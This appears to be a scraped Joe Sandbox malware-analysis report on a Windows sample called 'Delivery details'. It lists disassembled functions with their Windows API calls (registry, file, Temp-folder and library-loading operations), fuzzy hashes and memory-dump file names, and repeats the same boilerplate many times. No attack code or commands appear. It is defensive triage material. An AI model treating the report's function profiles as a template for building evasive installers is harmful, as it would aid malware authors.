Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
Instruction ID: 968097f9e37e498ed83c4652799cdf8e1ebeb5c7fee57b8dc09d96684c556b9e
Opcode Fuzzy Hash: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
Instruction Fuzzy Hash: 27712471E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786996DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406DC3 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
Instruction ID: 737cb098acab11621bc79b115fd6dc57f162d32c21417d2b0fd17844244e9397
Opcode Fuzzy Hash: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
Instruction Fuzzy Hash: 5A714571E04228CFEF28CF98C8447ADBBB1FB44305F14806AD956BB281C778A996DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004023DE Relevance: 4.6, APIs: 3, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0040B5D8,00000023,00000011,00000002), ref: 00402429
RegSetValueExW.KERNELBASE(?,?,?,?,0040B5D8,00000000,00000011,00000002), ref: 00402469
RegCloseKey.ADVAPI32(?,?,?,0040B5D8,00000000,00000011,00000002), ref: 00402551

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: CloseValuelstrlen
String ID:
API String ID: 2655323295-0
Opcode ID: 35e6e7eefd86a95ec2f493a4987e613e5da277515d630d613e6a1d7d24eea922
Instruction ID: 1eab41df84c6b24c6b923ea001d17cdc0cfdc7d4c8a499a75fdfc4da8179f3fa
Opcode Fuzzy Hash: 35e6e7eefd86a95ec2f493a4987e613e5da277515d630d613e6a1d7d24eea922
Instruction Fuzzy Hash: A1118171E00108AFEB10AFA5DE49EAEBAB4EB54354F11803AF504F71D1DBB84D459B58

Uniqueness

Uniqueness Score: -1.00%

Function 004031BA Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 004031DF

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
Instruction ID: 4c6ae7a0626839fce45d877b24888c0af913333af22313e68c4d1644c71cb298
Opcode Fuzzy Hash: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
Instruction Fuzzy Hash: 3B319C3020021AFFDB109F95ED84ADB3F68EB04359B1085BEF904E6190D778CE509BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
RegCloseKey.ADVAPI32(?,?,?,0040B5D8,00000000,00000011,00000002), ref: 00402551

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: da6c4aabe5c0bcfe0cfe451c3c0d1b5c22d07e7435fa277cc4dedf5435b1c7e5
Instruction ID: 2d27e3624369fee7c217219a4e344138e42523264533ea489648bddc6477d6d2
Opcode Fuzzy Hash: da6c4aabe5c0bcfe0cfe451c3c0d1b5c22d07e7435fa277cc4dedf5435b1c7e5
Instruction Fuzzy Hash: 53119171900209EBEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D7B84A45DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D

Uniqueness

Uniqueness Score: -1.00%

Function 004054E7 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004054F7

Part of subcall function 00404391: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A3

OleUninitialize.OLE32(00000404,00000000), ref: 00405543

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: 9116b902906b86037e4df952d1fb06ecf8b3d5b9aeab51ae864e340321e9afd2
Instruction ID: 461e397135febbc30a5c9d3c302966ffa091eeef35a1e5a31f22b0d6bdb391fd
Opcode Fuzzy Hash: 9116b902906b86037e4df952d1fb06ecf8b3d5b9aeab51ae864e340321e9afd2
Instruction Fuzzy Hash: E1F0F072600A00EBE7215B80AD01B267365EBC4304F41407BFE88723A4C77A4C02CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 0040678A Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
GetProcAddress.KERNEL32(00000000,?), ref: 004067B7

Part of subcall function 0040671A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
Part of subcall function 0040671A: wsprintfW.USER32 ref: 0040676C
Part of subcall function 0040671A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406780

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
Instruction ID: 6fedc38abd16d04710e8a636fd16f84820eabe090bba127bd882252d3fb3e83b
Opcode Fuzzy Hash: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
Instruction Fuzzy Hash: 21E0863250421156D21096745E4893772AC9AC4718307843EF956F3041DB389C35A76D

Uniqueness

Uniqueness Score: -1.00%

Function 00405EA2 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402F57,00438800,80000000,00000003), ref: 00405EA6
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405E7D Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405A82,?,?,00000000,00405C58,?,?,?,?), ref: 00405E82
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E96

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction ID: b4a9c655c7fc096b4b126609cc6ca019b0e5db690544b5b17486f729e9fe50d2
Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction Fuzzy Hash: F4D0C972504420ABC2502728EF0889BBB95DB542727124B35FAE9A22B0CB304C568A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405960 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036D5,?,00000006,00000008,0000000A), ref: 00405966
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405974

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
Instruction ID: a0b70af09676f49ae35af12b400ff138e6ea5c47fed9fef2c083bef2843b0e9d
Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
Instruction Fuzzy Hash: 97C04C71255506DADB105F31DE08F1B7A50AB60751F11843AA18AE51B0DA348455DD2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040624B Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406274

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: 479e159ceda2cb7b50184963f42fe168e38793edbf0b306f3e9e40cefa011f94
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: F5E0E672010109BEEF195F50DD0AD7B371DE704314F01452EFA07E4051E6B5A9305734

Uniqueness

Uniqueness Score: -1.00%

Function 00405F54 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00411A8B,0040CED0,004033C2,0040CED0,00411A8B,00414ED0,00004000,?,00000000,004031EC,00000004), ref: 00405F68

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 6078229a914e39b74a0c5ece066be2a5834b756046c3aff4b734283800ecbe33
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: 2DE0EC3221065EABDF109EA59C00EEB7B6CFB053A0F004437FD25E3150D775E9219BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405F25 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040343E,0040A230,0040A230,00403342,00414ED0,00004000,?,00000000,004031EC), ref: 00405F39

Memory Dump Source

Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: 9b2ea83f702eb3fffeb4c264c614e4c5cb206e28bf88f3110778221d7db1fef5
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
